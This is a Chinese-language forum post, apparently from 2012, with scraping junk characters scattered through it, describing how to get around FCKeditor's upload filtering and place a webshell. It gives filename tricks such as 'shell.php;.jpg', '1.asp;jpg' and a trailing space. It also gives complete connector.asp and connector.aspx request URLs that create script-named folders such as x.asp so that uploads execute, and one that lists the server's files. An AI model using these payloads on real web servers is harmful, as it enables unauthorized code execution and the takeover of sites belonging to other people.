很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
2 e8 K, q. J/ b# s
0 ~3 Z. L! V( r( k8 O提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。: S; E2 I3 G) B4 B8 x1 Q, U
' [& w- H# a5 N7 n. D% O2 R0 v& c! v
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。8 {- t4 v% b: z/ W
; C8 K( e* p9 v5 U- N. N. o% e突破建立文件夹:. g: q0 }" M+ }1 {# J: j
! G5 x. @9 W1 qeditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp) Q! S* ?6 x$ e3 Z" c
* G, @ E I! \参数:
2 A1 _4 \4 w8 B4 G* g1 B# e s2 C8 ^4 A9 }) a
当前目录名:CurrentFolder=/qing.asp, N. O1 i: C) B) R6 x7 @
2 l$ _/ p2 _; K0 w: d
新的目录名:NewFolderName=x.asp
& ~' W6 a" [, v5 f) C" k. H* ^9 M. p$ k& ]/ K
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
1 J, u0 @# v9 f* [$ p; b: R
# k; K6 C: t# B- G1 h那么 x.asp 就已经建立生成了,此方法百试百灵!
# g* j1 Y2 d. y( g* A/ P+ |
) M R. u5 E% H/ l& B- X3 Q新建文件夹参数 x.asp,基本都能搞定。/ M+ ], u& Q# H6 `6 u
1 F. e5 p6 G" p( k" m下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建0 t9 G8 s) r9 H5 g
1 g Z8 ` ?7 d/ q2 Gaspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
! \2 Z5 p q0 S) _2 B( M, [% z, B" H6 N( w# B
获取文件列表4 y0 i' @" _2 Z: ] } Y2 [( \% P
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
7 _- c9 x; j* ]6 a' O7 h- d( E* |7 |8 `+ `6 l
|
发表于 2012-12-31 09:27:09
收藏
支持
反对